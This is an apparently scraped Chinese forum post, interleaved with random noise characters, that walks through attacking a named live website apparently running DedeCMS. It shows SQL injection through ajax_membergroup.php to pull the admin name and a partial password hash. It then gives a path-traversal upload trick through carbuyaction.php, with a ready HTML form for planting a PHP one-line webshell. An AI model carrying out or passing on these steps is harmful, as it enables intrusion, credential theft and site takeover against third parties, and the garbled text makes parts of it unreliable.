①注入漏洞。7 L( |# ?8 j" o$ d2 \1 k
这站 http://www.political-security.com/
6 O* w* i/ j& ?. x! x2 I首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
4 w- T8 z x1 i( y) M* I/ Twww.political-security.com/data/mysql_error_trace.inc 爆后台
) t+ r0 ~- n1 P! ^然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
% J2 a# e! J$ j2 f然后写上语句
1 [/ [6 s* v& ?/ |+ w+ }查看管理员帐号
# a) m# s1 a: O: Q& g S6 _http://www.political-security.co ... &membergroup=@` B' @$ z/ t+ R M6 J
, S! D* O8 e3 E% U5 N
admin
3 Y$ b) L+ t& s, J% r( `( ~5 d1 N& `8 S4 s; j9 t* z
查看管理员密码
8 E) L! t$ W' d% n http://www.political-security.co ... &membergroup=@`
( N+ a5 |( I6 I! I0 }% ?5 A4 B* e) R5 C
8d29b1ef9f8c5a5af4297 k7 J& @& u R9 N/ D3 `0 b
( S( p/ _) k8 E8 m. j' z! F查看管理员密码3 c# n' [1 @& D1 x k
' @$ s u9 }. C" t
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5) ~6 c' m J' i4 z8 o6 f
% k% { t6 C5 |8d2
8 z! o% _. Y9 S: r2 ?9b1ef9f8c5a5af42% T3 ^, t$ v$ j$ }& O
9
* P; x7 R" i) \- r' Q% R0 `0 e$ U+ F0 ~) p; e
cmd5没解出来 只好测试第二个方法
( D* L2 }* E/ \; c* n
x( {% R9 }5 n8 ^6 w/ P
3 j- b. ^5 I, |1 X2 L6 b) \3 X; @0 ^②上传漏洞:4 e, n( Q6 l( J0 Y% F5 W: I
~7 S) i) M, N# h4 o3 m# W) P只要登陆会员中心,然后访问页面链接& x4 W6 X3 z; O! M% A" q
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
' D. B- ~3 C. _' m
3 a( i9 U: }" o* b+ h4 J, A8 L如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”3 F" z' X- Z4 Y* c/ D
, l; Y, f) T5 T9 v
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm" S; f! l5 u" ?4 b
. D7 \' R0 h* `& M( s5 G s8 {6 {' T% f<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
- M7 u% V- _/ B3 E: s$ h或者
7 c; u6 J+ I/ s' m) @7 d* E) r- J: ]即可上传成功 |